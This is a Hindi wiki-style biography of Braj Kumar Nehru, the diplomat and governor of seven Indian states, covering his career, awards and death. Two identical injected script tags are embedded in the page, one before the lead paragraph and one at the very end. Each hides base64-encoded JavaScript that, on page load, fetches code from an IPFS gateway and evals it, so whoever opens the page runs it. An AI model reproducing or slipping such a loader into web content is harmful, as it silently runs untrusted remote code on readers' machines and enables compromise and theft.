ब्रज कुमार नेहरू

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 09:22, 14 जून 2022 का अवतरण
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें
ब्रज कुमार नेहरू
ब्रज कुमार नेहरू
पूरा नाम ब्रज कुमार नेहरू
जन्म 4 सितम्बर, 1909
जन्म भूमि इलाहाबाद, उत्तर प्रदेश
मृत्यु 31 अक्टूबर, 2001
मृत्यु स्थान कसौली, हिमाचल प्रदेश
अभिभावक माता- रामेश्वरी देवी

पिता- बृजलाल नेहरू

पति/पत्नी शोभा नेहरू
नागरिकता भारतीय
पद राज्यपाल, गुजरात- 26 अप्रॅल, 1984 से 26 फ़रवरी, 1986 तक

राज्यपाल, जम्मू और कश्मीर- 22 फ़रवरी, 1981 से 26 अप्रॅल, 1984 तक
राज्यपाल, मणिपुर- 21 जनवरी, 1972 से 20 सितम्बर, 1973 तक
राज्यपाल, मेघालय- 1 अप्रॅल, 1970 से 18 सितम्बर, 1973 तक
राज्यपाल, नागालैंड- 17 अप्रॅल, 1968 से 18 सितम्बर, 1973 तक
राज्यपाल, असम- 17 अप्रॅल, 1968 से 19 सितम्बर, 1973 तक
राज्यपाल, त्रिपुरा- 21 जनवरी, 1972 से 22 सितम्बर, 1973

अन्य जानकारी ब्रज कुमार नेहरू साल 1934 में भारतीय सिविल सेवा में चुने गये और भारत के सात राज्यों के राज्यपाल बने। उन्होंने 'नाइस गाइज़ फ़िनिश सेकेंड' शीर्षक से आत्मकथा भी लिखी।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>ब्रज कुमार नेहरू (अंग्रेज़ी: Braj Kumar Nehru, जन्म- 4 सितम्बर, 1909; मृत्यु- 31 अक्टूबर, 2001) भारत के प्रथम प्रधानमंत्री जवाहरलाल नेहरू के चचेरे भाई बृजलाल और रामेश्वरी नेहरू के पुत्र थे। वह भारतीय राजनयिक और संयुक्त राज्य अमेरिका में भारतीय राजदूत रहे थे। ब्रज कुमार नेहरू भारतीय सिविल सेवा में चुने गये थे। वह भारत के सात राज्यों के राज्यपाल भी बने। ब्रज कुमार नेहरू ने 'नाइस गाइज़ फ़िनिश सेकेंड' शीर्षक से आत्मकथा भी लिखी।

परिचय

ब्रज कुमार नेहरू का जन्म 4 सितम्बर, सन 1909 में इलाहाबाद, उत्तर प्रदेश में हुआ। उनके पिता का नाम बृजलाल नेहरू एवं माँ का नाम रामेश्वरी देवी था। उन्होंने इलाहाबाद विश्वविद्यालय, द लंदन स्कूल ऑफ़ इकोनोमिक्स और ऑक्सफ़र्ड विश्वविद्यालय से शिक्षा प्राप्त की। उन्हें उनके विभिन्न क्षेत्रों में प्रतिष्ठित कार्य के लिए जामिया पंजाब[1] ने साहित्य में डॉक्ट्रेट की उपाधि प्रदान की थी। उनके दादा पण्डित नन्दलाल नेहरू, पंडित मोतीलाल नेहरू के बड़े भाई थे। वह भारत की भूतपूर्व प्रधानमंत्री इंदिरा गाँधी के चचेरे भाई थे।

राज्यपाल

ब्रज कुमार नेहरू साल 1934 में भारतीय सिविल सेवा में चुने गये और भारत के सात राज्यों के राज्यपाल बने। सन 1934 से 1937 के मध्य उन्हें पंजाब प्रान्त के विभिन गर्वनर पदों पर नियुक्ति दी गयी। उन्हें 1945 के नववर्ष सम्मान सूची में ब्रिटिश साम्राज्य के सर्वोच्च सम्मान के लिए चुना गया। ब्रज कुमार नेहरू 1957 में वितीय मामलों के सचिव बने। उन्हें 1958 में भारत के वित विभाग का जनरल आयुक्त नियुक्त किया गया। वे जम्मू और कश्मीर, असम, गुजरात, नागालैण्ड, मेघालय, मणिपुर और त्रिपुरा के राज्यपाल रहे।

पुरस्कार

ब्रज कुमार नेहरू को साल 1999 में भारत सरकार ने 'पद्म विभूषण' से सम्मनित किया था।

मृत्यु

31 अक्टूबर, 2001 को हिमाचल प्रदेश के कसौली में ब्रज कुमार नेहरू का निधन हुआ। उनके शव को दाह संस्कार के लिए दिल्ली लाया गया था।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. वर्तमान में पाकिस्तानी पंजाब में स्थित पंजाब विश्वविद्यालय

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>